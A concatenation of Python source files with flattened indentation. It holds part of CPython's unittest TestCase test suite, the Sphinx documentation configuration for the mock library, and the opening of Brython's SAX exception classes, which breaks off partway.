# set a lower threshold value and add a cleanup to restore it
old_threshold = self._diffThreshold
self._diffThreshold = 2**5
self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))
# under the threshold: diff marker (^) in error message
s = 'x' * (2**4)
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s + 'a', s + 'b')
self.assertIn('^', str(cm.exception))
self.assertEqual(s + 'a', s + 'a')
# over the threshold: diff not used and marker (^) not in error message
s = 'x' * (2**6)
# if the path that uses difflib is taken, _truncateMessage will be
# called -- replace it with explodingTruncation to verify that this
# doesn't happen
def explodingTruncation(message, diff):
raise SystemError('this should not be raised')
old_truncate = self._truncateMessage
self._truncateMessage = explodingTruncation
self.addCleanup(lambda: setattr(self, '_truncateMessage', old_truncate))
s1, s2 = s + 'a', s + 'b'
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
self.assertNotIn('^', str(cm.exception))
self.assertEqual(str(cm.exception), '%r != %r' % (s1, s2))
self.assertEqual(s + 'a', s + 'a')
def testAssertEqual_shorten(self):
# set a lower threshold value and add a cleanup to restore it
old_threshold = self._diffThreshold
self._diffThreshold = 0
self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))
s = 'x' * 100
s1, s2 = s + 'a', s + 'b'
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[35 chars]' + 'x' * 61
self.assertEqual(str(cm.exception), "'%sa' != '%sb'" % (c, c))
self.assertEqual(s + 'a', s + 'a')
p = 'y' * 50
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[85 chars]xxxxxxxxxxx'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, p, c, p))
p = 'y' * 100
s1, s2 = s + 'a' + p, s + 'b' + p
with self.assertRaises(self.failureException) as cm:
self.assertEqual(s1, s2)
c = 'xxxx[91 chars]xxxxx'
d = 'y' * 40 + '[56 chars]yyyy'
self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, d, c, d))
def testAssertCountEqual(self):
a = object()
self.assertCountEqual([1, 2, 3], [3, 2, 1])
self.assertCountEqual(['foo', 'bar', 'baz'], ['bar', 'baz', 'foo'])
self.assertCountEqual([a, a, 2, 2, 3], (a, 2, 3, a, 2))
self.assertCountEqual([1, "2", "a", "a"], ["a", "2", True, "a"])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, 2] + [3] * 100, [1] * 100 + [2, 3])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, "2", "a", "a"], ["a", "2", True, 1])
self.assertRaises(self.failureException, self.assertCountEqual,
[10], [10, 11])
self.assertRaises(self.failureException, self.assertCountEqual,
[10, 11], [10])
self.assertRaises(self.failureException, self.assertCountEqual,
[10, 11, 10], [10, 11])
# Test that sequences of unhashable objects can be tested for sameness:
self.assertCountEqual([[1, 2], [3, 4], 0], [False, [3, 4], [1, 2]])
# Test that iterator of unhashable objects can be tested for sameness:
self.assertCountEqual(iter([1, 2, [], 3, 4]),
iter([1, 2, [], 3, 4]))
# hashable types, but not orderable
self.assertRaises(self.failureException, self.assertCountEqual,
[], [divmod, 'x', 1, 5j, 2j, frozenset()])
# comparing dicts
self.assertCountEqual([{'a': 1}, {'b': 2}], [{'b': 2}, {'a': 1}])
# comparing heterogenous non-hashable sequences
self.assertCountEqual([1, 'x', divmod, []], [divmod, [], 'x', 1])
self.assertRaises(self.failureException, self.assertCountEqual,
[], [divmod, [], 'x', 1, 5j, 2j, set()])
self.assertRaises(self.failureException, self.assertCountEqual,
[[1]], [[2]])
# Same elements, but not same sequence length
self.assertRaises(self.failureException, self.assertCountEqual,
[1, 1, 2], [2, 1])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, 1, "2", "a", "a"], ["2", "2", True, "a"])
self.assertRaises(self.failureException, self.assertCountEqual,
[1, {'b': 2}, None, True], [{'b': 2}, True, None])
# Same elements which don't reliably compare, in
# different order, see issue 10242
a = [{2,4}, {1,2}]
b = a[::-1]
self.assertCountEqual(a, b)
# test utility functions supporting assertCountEqual()
diffs = set(unittest.util._count_diff_all_purpose('aaabccd', 'abbbcce'))
expected = {(3,1,'a'), (1,3,'b'), (1,0,'d'), (0,1,'e')}
self.assertEqual(diffs, expected)
diffs = unittest.util._count_diff_all_purpose([[]], [])
self.assertEqual(diffs, [(1, 0, [])])
diffs = set(unittest.util._count_diff_hashable('aaabccd', 'abbbcce'))
expected = {(3,1,'a'), (1,3,'b'), (1,0,'d'), (0,1,'e')}
self.assertEqual(diffs, expected)
def testAssertSetEqual(self):
set1 = set()
set2 = set()
self.assertSetEqual(set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, None, set2)
self.assertRaises(self.failureException, self.assertSetEqual, [], set2)
self.assertRaises(self.failureException, self.assertSetEqual, set1, None)
self.assertRaises(self.failureException, self.assertSetEqual, set1, [])
set1 = set(['a'])
set2 = set()
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = set(['a'])
self.assertSetEqual(set1, set2)
set1 = set(['a'])
set2 = set(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a'])
set2 = frozenset(['a', 'b'])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
set1 = set(['a', 'b'])
set2 = frozenset(['a', 'b'])
self.assertSetEqual(set1, set2)
set1 = set()
set2 = "foo"
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
self.assertRaises(self.failureException, self.assertSetEqual, set2, set1)
# make sure any string formatting is tuple-safe
set1 = set([(0, 1), (2, 3)])
set2 = set([(4, 5)])
self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
def testInequality(self):
# Try ints
self.assertGreater(2, 1)
self.assertGreaterEqual(2, 1)
self.assertGreaterEqual(1, 1)
self.assertLess(1, 2)
self.assertLessEqual(1, 2)
self.assertLessEqual(1, 1)
self.assertRaises(self.failureException, self.assertGreater, 1, 2)
self.assertRaises(self.failureException, self.assertGreater, 1, 1)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1, 2)
self.assertRaises(self.failureException, self.assertLess, 2, 1)
self.assertRaises(self.failureException, self.assertLess, 1, 1)
self.assertRaises(self.failureException, self.assertLessEqual, 2, 1)
# Try Floats
self.assertGreater(1.1, 1.0)
self.assertGreaterEqual(1.1, 1.0)
self.assertGreaterEqual(1.0, 1.0)
self.assertLess(1.0, 1.1)
self.assertLessEqual(1.0, 1.1)
self.assertLessEqual(1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertGreaterEqual, 1.0, 1.1)
self.assertRaises(self.failureException, self.assertLess, 1.1, 1.0)
self.assertRaises(self.failureException, self.assertLess, 1.0, 1.0)
self.assertRaises(self.failureException, self.assertLessEqual, 1.1, 1.0)
# Try Strings
self.assertGreater('bug', 'ant')
self.assertGreaterEqual('bug', 'ant')
self.assertGreaterEqual('ant', 'ant')
self.assertLess('ant', 'bug')
self.assertLessEqual('ant', 'bug')
self.assertLessEqual('ant', 'ant')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertGreater, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, 'ant', 'bug')
self.assertRaises(self.failureException, self.assertLess, 'bug', 'ant')
self.assertRaises(self.failureException, self.assertLess, 'ant', 'ant')
self.assertRaises(self.failureException, self.assertLessEqual, 'bug', 'ant')
# Try bytes
self.assertGreater(b'bug', b'ant')
self.assertGreaterEqual(b'bug', b'ant')
self.assertGreaterEqual(b'ant', b'ant')
self.assertLess(b'ant', b'bug')
self.assertLessEqual(b'ant', b'bug')
self.assertLessEqual(b'ant', b'ant')
self.assertRaises(self.failureException, self.assertGreater, b'ant', b'bug')
self.assertRaises(self.failureException, self.assertGreater, b'ant', b'ant')
self.assertRaises(self.failureException, self.assertGreaterEqual, b'ant',
b'bug')
self.assertRaises(self.failureException, self.assertLess, b'bug', b'ant')
self.assertRaises(self.failureException, self.assertLess, b'ant', b'ant')
self.assertRaises(self.failureException, self.assertLessEqual, b'bug', b'ant')
def testAssertMultiLineEqual(self):
sample_text = """\
http://www.python.org/doc/2.3/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...]
"""
revised_sample_text = """\
http://www.python.org/doc/2.4.1/lib/module-unittest.html
test case
A test case is the smallest unit of testing. [...] You may provide your
own implementation that does not subclass from TestCase, of course.
"""
sample_text_error = """\
- http://www.python.org/doc/2.3/lib/module-unittest.html
? ^
+ http://www.python.org/doc/2.4.1/lib/module-unittest.html
? ^^^
test case
- A test case is the smallest unit of testing. [...]
+ A test case is the smallest unit of testing. [...] You may provide your
? +++++++++++++++++++++
+ own implementation that does not subclass from TestCase, of course.
"""
self.maxDiff = None
try:
self.assertMultiLineEqual(sample_text, revised_sample_text)
except self.failureException as e:
# need to remove the first line of the error message
error = str(e).split('\n', 1)[1]
# no fair testing ourself with ourself, and assertEqual is used for strings
# so can't use assertEqual either. Just use assertTrue.
self.assertTrue(sample_text_error == error)
def testAsertEqualSingleLine(self):
sample_text = "laden swallows fly slowly"
revised_sample_text = "unladen swallows fly quickly"
sample_text_error = """\
- laden swallows fly slowly
? ^^^^
+ unladen swallows fly quickly
? ++ ^^^^^
"""
try:
self.assertEqual(sample_text, revised_sample_text)
except self.failureException as e:
error = str(e).split('\n', 1)[1]
self.assertTrue(sample_text_error == error)
def testAssertIsNone(self):
self.assertIsNone(None)
self.assertRaises(self.failureException, self.assertIsNone, False)
self.assertIsNotNone('DjZoPloGears on Rails')
self.assertRaises(self.failureException, self.assertIsNotNone, None)
def testAssertRegex(self):
self.assertRegex('asdfabasdf', r'ab+')
self.assertRaises(self.failureException, self.assertRegex,
'saaas', r'aaaa')
def testAssertRaisesCallable(self):
class ExceptionMock(Exception):
pass
def Stub():
raise ExceptionMock('We expect')
self.assertRaises(ExceptionMock, Stub)
# A tuple of exception classes is accepted
self.assertRaises((ValueError, ExceptionMock), Stub)
# *args and **kwargs also work
self.assertRaises(ValueError, int, '19', base=8)
# Failure when no exception is raised
with self.assertRaises(self.failureException):
self.assertRaises(ExceptionMock, lambda: 0)
# Failure when another exception is raised
with self.assertRaises(ExceptionMock):
self.assertRaises(ValueError, Stub)
def testAssertRaisesContext(self):
class ExceptionMock(Exception):
pass
def Stub():
raise ExceptionMock('We expect')
with self.assertRaises(ExceptionMock):
Stub()
# A tuple of exception classes is accepted
with self.assertRaises((ValueError, ExceptionMock)) as cm:
Stub()
# The context manager exposes caught exception
self.assertIsInstance(cm.exception, ExceptionMock)
self.assertEqual(cm.exception.args[0], 'We expect')
# *args and **kwargs also work
with self.assertRaises(ValueError):
int('19', base=8)
# Failure when no exception is raised
with self.assertRaises(self.failureException):
with self.assertRaises(ExceptionMock):
pass
# Failure when another exception is raised
with self.assertRaises(ExceptionMock):
self.assertRaises(ValueError, Stub)
def testAssertRaisesRegex(self):
class ExceptionMock(Exception):
pass
def Stub():
raise ExceptionMock('We expect')
self.assertRaisesRegex(ExceptionMock, re.compile('expect$'), Stub)
self.assertRaisesRegex(ExceptionMock, 'expect$', Stub)
def testAssertNotRaisesRegex(self):
self.assertRaisesRegex(
self.failureException, '^Exception not raised by <lambda>$',
self.assertRaisesRegex, Exception, re.compile('x'),
lambda: None)
self.assertRaisesRegex(
self.failureException, '^Exception not raised by <lambda>$',
self.assertRaisesRegex, Exception, 'x',
lambda: None)
def testAssertRaisesRegexInvalidRegex(self):
# Issue 20145.
class MyExc(Exception):
pass
self.assertRaises(TypeError, self.assertRaisesRegex, MyExc, lambda: True)
def testAssertWarnsRegexInvalidRegex(self):
# Issue 20145.
class MyWarn(Warning):
pass
self.assertRaises(TypeError, self.assertWarnsRegex, MyWarn, lambda: True)
def testAssertRaisesRegexMismatch(self):
def Stub():
raise Exception('Unexpected')
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception, '^Expected$',
Stub)
self.assertRaisesRegex(
self.failureException,
r'"\^Expected\$" does not match "Unexpected"',
self.assertRaisesRegex, Exception,
re.compile('^Expected$'), Stub)
def testAssertRaisesExcValue(self):
class ExceptionMock(Exception):
pass
def Stub(foo):
raise ExceptionMock(foo)
v = "particular value"
ctx = self.assertRaises(ExceptionMock)
with ctx:
Stub(v)
e = ctx.exception
self.assertIsInstance(e, ExceptionMock)
self.assertEqual(e.args[0], v)
def testAssertWarnsCallable(self):
def _runtime_warn():
warnings.warn("foo", RuntimeWarning)
# Success when the right warning is triggered, even several times
self.assertWarns(RuntimeWarning, _runtime_warn)
self.assertWarns(RuntimeWarning, _runtime_warn)
# A tuple of warning classes is accepted
self.assertWarns((DeprecationWarning, RuntimeWarning), _runtime_warn)
# *args and **kwargs also work
self.assertWarns(RuntimeWarning,
warnings.warn, "foo", category=RuntimeWarning)
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
self.assertWarns(RuntimeWarning, lambda: 0)
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
self.assertWarns(DeprecationWarning, _runtime_warn)
# Filters for other warnings are not modified
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises(RuntimeWarning):
self.assertWarns(DeprecationWarning, _runtime_warn)
def testAssertWarnsContext(self):
# Believe it or not, it is preferable to duplicate all tests above,
# to make sure the __warningregistry__ $@ is circumvented correctly.
def _runtime_warn():
warnings.warn("foo", RuntimeWarning)
_runtime_warn_lineno = inspect.getsourcelines(_runtime_warn)[1]
with self.assertWarns(RuntimeWarning) as cm:
_runtime_warn()
# A tuple of warning classes is accepted
with self.assertWarns((DeprecationWarning, RuntimeWarning)) as cm:
_runtime_warn()
# The context manager exposes various useful attributes
self.assertIsInstance(cm.warning, RuntimeWarning)
self.assertEqual(cm.warning.args[0], "foo")
self.assertIn("test_case.py", cm.filename)
self.assertEqual(cm.lineno, _runtime_warn_lineno + 1)
# Same with several warnings
with self.assertWarns(RuntimeWarning):
_runtime_warn()
_runtime_warn()
with self.assertWarns(RuntimeWarning):
warnings.warn("foo", category=RuntimeWarning)
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
with self.assertWarns(RuntimeWarning):
pass
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
with self.assertWarns(DeprecationWarning):
_runtime_warn()
# Filters for other warnings are not modified
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises(RuntimeWarning):
with self.assertWarns(DeprecationWarning):
_runtime_warn()
def testAssertWarnsRegexCallable(self):
def _runtime_warn(msg):
warnings.warn(msg, RuntimeWarning)
self.assertWarnsRegex(RuntimeWarning, "o+",
_runtime_warn, "foox")
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
self.assertWarnsRegex(RuntimeWarning, "o+",
lambda: 0)
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
self.assertWarnsRegex(DeprecationWarning, "o+",
_runtime_warn, "foox")
# Failure when message doesn't match
with self.assertRaises(self.failureException):
self.assertWarnsRegex(RuntimeWarning, "o+",
_runtime_warn, "barz")
# A little trickier: we ask RuntimeWarnings to be raised, and then
# check for some of them. It is implementation-defined whether
# non-matching RuntimeWarnings are simply re-raised, or produce a
# failureException.
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises((RuntimeWarning, self.failureException)):
self.assertWarnsRegex(RuntimeWarning, "o+",
_runtime_warn, "barz")
def testAssertWarnsRegexContext(self):
# Same as above, but with assertWarnsRegex as a context manager
def _runtime_warn(msg):
warnings.warn(msg, RuntimeWarning)
_runtime_warn_lineno = inspect.getsourcelines(_runtime_warn)[1]
with self.assertWarnsRegex(RuntimeWarning, "o+") as cm:
_runtime_warn("foox")
self.assertIsInstance(cm.warning, RuntimeWarning)
self.assertEqual(cm.warning.args[0], "foox")
self.assertIn("test_case.py", cm.filename)
self.assertEqual(cm.lineno, _runtime_warn_lineno + 1)
# Failure when no warning is triggered
with self.assertRaises(self.failureException):
with self.assertWarnsRegex(RuntimeWarning, "o+"):
pass
# Failure when another warning is triggered
with warnings.catch_warnings():
# Force default filter (in case tests are run with -We)
warnings.simplefilter("default", RuntimeWarning)
with self.assertRaises(self.failureException):
with self.assertWarnsRegex(DeprecationWarning, "o+"):
_runtime_warn("foox")
# Failure when message doesn't match
with self.assertRaises(self.failureException):
with self.assertWarnsRegex(RuntimeWarning, "o+"):
_runtime_warn("barz")
# A little trickier: we ask RuntimeWarnings to be raised, and then
# check for some of them. It is implementation-defined whether
# non-matching RuntimeWarnings are simply re-raised, or produce a
# failureException.
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
with self.assertRaises((RuntimeWarning, self.failureException)):
with self.assertWarnsRegex(RuntimeWarning, "o+"):
_runtime_warn("barz")
@contextlib.contextmanager
def assertNoStderr(self):
with captured_stderr() as buf:
yield
self.assertEqual(buf.getvalue(), "")
def assertLogRecords(self, records, matches):
self.assertEqual(len(records), len(matches))
for rec, match in zip(records, matches):
self.assertIsInstance(rec, logging.LogRecord)
for k, v in match.items():
self.assertEqual(getattr(rec, k), v)
def testAssertLogsDefaults(self):
# defaults: root logger, level INFO
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
self.assertEqual(cm.output, ["INFO:foo:1"])
self.assertLogRecords(cm.records, [{'name': 'foo'}])
def testAssertLogsTwoMatchingMessages(self):
# Same, but with two matching log messages
with self.assertNoStderr():
with self.assertLogs() as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "WARNING:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'quux'}])
def checkAssertLogsPerLevel(self, level):
# Check level filtering
with self.assertNoStderr():
with self.assertLogs(level=level) as cm:
log_foo.warning("1")
log_foobar.error("2")
log_quux.critical("3")
self.assertEqual(cm.output, ["ERROR:foo.bar:2", "CRITICAL:quux:3"])
self.assertLogRecords(cm.records,
[{'name': 'foo.bar'}, {'name': 'quux'}])
def testAssertLogsPerLevel(self):
self.checkAssertLogsPerLevel(logging.ERROR)
self.checkAssertLogsPerLevel('ERROR')
def checkAssertLogsPerLogger(self, logger):
# Check per-logger filtering
with self.assertNoStderr():
with self.assertLogs(level='DEBUG') as outer_cm:
with self.assertLogs(logger, level='DEBUG') as cm:
log_foo.info("1")
log_foobar.debug("2")
log_quux.warning("3")
self.assertEqual(cm.output, ["INFO:foo:1", "DEBUG:foo.bar:2"])
self.assertLogRecords(cm.records,
[{'name': 'foo'}, {'name': 'foo.bar'}])
# The outer catchall caught the quux log
self.assertEqual(outer_cm.output, ["WARNING:quux:3"])
def testAssertLogsPerLogger(self):
self.checkAssertLogsPerLogger(logging.getLogger('foo'))
self.checkAssertLogsPerLogger('foo')
def testAssertLogsFailureNoLogs(self):
# Failure due to no logs
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs():
pass
def testAssertLogsFailureLevelTooHigh(self):
# Failure due to level too high
with self.assertNoStderr():
with self.assertRaises(self.failureException):
with self.assertLogs(level='WARNING'):
log_foo.info("1")
def testAssertLogsFailureMismatchingLogger(self):
# Failure due to mismatching logger (and the logged message is
# passed through)
with self.assertLogs('quux', level='ERROR'):
with self.assertRaises(self.failureException):
with self.assertLogs('foo'):
log_quux.error("1")
def testDeprecatedMethodNames(self):
"""
Test that the deprecated methods raise a DeprecationWarning. See #9424.
"""
old = (
(self.failIfEqual, (3, 5)),
(self.assertNotEquals, (3, 5)),
(self.failUnlessEqual, (3, 3)),
(self.assertEquals, (3, 3)),
(self.failUnlessAlmostEqual, (2.0, 2.0)),
(self.assertAlmostEquals, (2.0, 2.0)),
(self.failIfAlmostEqual, (3.0, 5.0)),
(self.assertNotAlmostEquals, (3.0, 5.0)),
(self.failUnless, (True,)),
(self.assert_, (True,)),
(self.failUnlessRaises, (TypeError, lambda _: 3.14 + 'spam')),
(self.failIf, (False,)),
(self.assertDictContainsSubset, (dict(a=1, b=2), dict(a=1, b=2, c=3))),
(self.assertRaisesRegexp, (KeyError, 'foo', lambda: {}['foo'])),
(self.assertRegexpMatches, ('bar', 'bar')),
)
for meth, args in old:
with self.assertWarns(DeprecationWarning):
meth(*args)
# disable this test for now. When the version where the fail* methods will
# be removed is decided, re-enable it and update the version
def _testDeprecatedFailMethods(self):
"""Test that the deprecated fail* methods get removed in 3.x"""
if sys.version_info[:2] < (3, 3):
return
deprecated_names = [
'failIfEqual', 'failUnlessEqual', 'failUnlessAlmostEqual',
'failIfAlmostEqual', 'failUnless', 'failUnlessRaises', 'failIf',
'assertDictContainsSubset',
]
for deprecated_name in deprecated_names:
with self.assertRaises(AttributeError):
getattr(self, deprecated_name) # remove these in 3.x
def testDeepcopy(self):
# Issue: 5660
class TestableTest(unittest.TestCase):
def testNothing(self):
pass
test = TestableTest('testNothing')
# This shouldn't blow up
deepcopy(test)
def testPickle(self):
# Issue 10326
# Can't use TestCase classes defined in Test class as
# pickle does not work with inner classes
test = unittest.TestCase('run')
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
# blew up prior to fix
pickled_test = pickle.dumps(test, protocol=protocol)
unpickled_test = pickle.loads(pickled_test)
self.assertEqual(test, unpickled_test)
# exercise the TestCase instance in a way that will invoke
# the type equality lookup mechanism
unpickled_test.assertEqual(set(), set())
def testKeyboardInterrupt(self):
def _raise(self=None):
raise KeyboardInterrupt
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _raise
class Test2(unittest.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
with self.assertRaises(KeyboardInterrupt):
klass('test_something').run()
def testSkippingEverywhere(self):
def _skip(self=None):
raise unittest.SkipTest('some reason')
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _skip
class Test2(unittest.TestCase):
setUp = _skip
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _skip
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_skip)
for klass in (Test1, Test2, Test3, Test4):
result = unittest.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.skipped), 1)
self.assertEqual(result.testsRun, 1)
def testSystemExit(self):
def _raise(self=None):
raise SystemExit
def nothing(self):
pass
class Test1(unittest.TestCase):
test_something = _raise
class Test2(unittest.TestCase):
setUp = _raise
test_something = nothing
class Test3(unittest.TestCase):
test_something = nothing
tearDown = _raise
class Test4(unittest.TestCase):
def test_something(self):
self.addCleanup(_raise)
for klass in (Test1, Test2, Test3, Test4):
result = unittest.TestResult()
klass('test_something').run(result)
self.assertEqual(len(result.errors), 1)
self.assertEqual(result.testsRun, 1)
@support.cpython_only
def testNoCycles(self):
case = unittest.TestCase()
wr = weakref.ref(case)
with support.disable_gc():
del case
self.assertFalse(wr())
def test_no_exception_leak(self):
# Issue #19880: TestCase.run() should not keep a reference
# to the exception
class MyException(Exception):
ninstance = 0
def __init__(self):
MyException.ninstance += 1
Exception.__init__(self)
def __del__(self):
MyException.ninstance -= 1
class TestCase(unittest.TestCase):
def test1(self):
raise MyException()
@unittest.expectedFailure
def test2(self):
raise MyException()
for method_name in ('test1', 'test2'):
testcase = TestCase(method_name)
testcase.run()
self.assertEqual(MyException.ninstance, 0)
if __name__ == "__main__":
unittest.main()
|
apache-2.0
|
fladi/mock
|
docs/conf.py
|
7
|
6297
|
# -*- coding: utf-8 -*-
#
# Mock documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 17 18:12:00 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
sys.path.insert(0, os.path.abspath('..'))
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.doctest']
doctest_global_setup = """
import os
import sys
import mock
from mock import * # yeah, I know :-/
import unittest2
import __main__
if os.getcwd() not in sys.path:
sys.path.append(os.getcwd())
# keep a reference to __main__
sys.modules['__main'] = __main__
class ProxyModule(object):
def __init__(self):
self.__dict__ = globals()
sys.modules['__main__'] = ProxyModule()
"""
doctest_global_cleanup = """
sys.modules['__main__'] = sys.modules['__main']
"""
html_theme = 'nature'
html_theme_options = {}
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = u'Mock'
copyright = u'2007-2015, Michael Foord & the mock team'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents. Supplied by pbr.
#
# The short X.Y version.
version = None
# The full version, including alpha/beta/rc tags.
release = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used: (Set from pbr)
today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'adctheme.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Mockdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
latex_font_size = '12pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('index', 'Mock.tex', u'Mock Documentation',
u'Michael Foord', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = False
|
bsd-2-clause
|
40223102/w16b_test
|
static/Brython3.1.1-20150328-091302/Lib/xml/sax/_exceptions.py
|
625
|
4885
|
"""Different kinds of SAX Exceptions"""
#in brython the 4 lines below causes an $globals['Exception'] error
#import sys
#if sys.platform[:4] == "java":
# from java.lang import Exception
#del sys
# ===== SAXEXCEPTION =====
class SAXException(Exception):
"""Encapsulate an XML error or warning. This class can contain
basic error or warning information from either the XML parser or
the application: you can subclass it to provide additional
functionality, or to add localization. Note that although you will
receive a SAXException as the argument to the handlers in the
ErrorHandler interface, you are not actually required to raise
the exception; instead, you can simply read the information in
it."""
def __init__(self, msg, exception=None):
"""Creates an exception. The message is required, but the exception
is optional."""
self._msg = msg
self._exception = exception
Exception.__init__(self, msg)
def getMessage(self):
"Return a message for this exception."
return self._msg
def getException(self):
"Return the embedded exception, or None if there was none."
return self._exception
def __str__(self):
"Create a string representation of the exception."
return self._msg
def __getitem__(self, ix):
"""Avoids weird error messages if someone does exception[ix] by
mistake, since Exception has __getitem__ defined."""
raise AttributeError("__getitem__")
# ===== SAXPARSEEXCEPTION =====
class SAXParseException(SAXException):
"""Encapsulate an XML parse error or warning.
This exception will include information for locating the error in
the original XML document. Note that although the application will
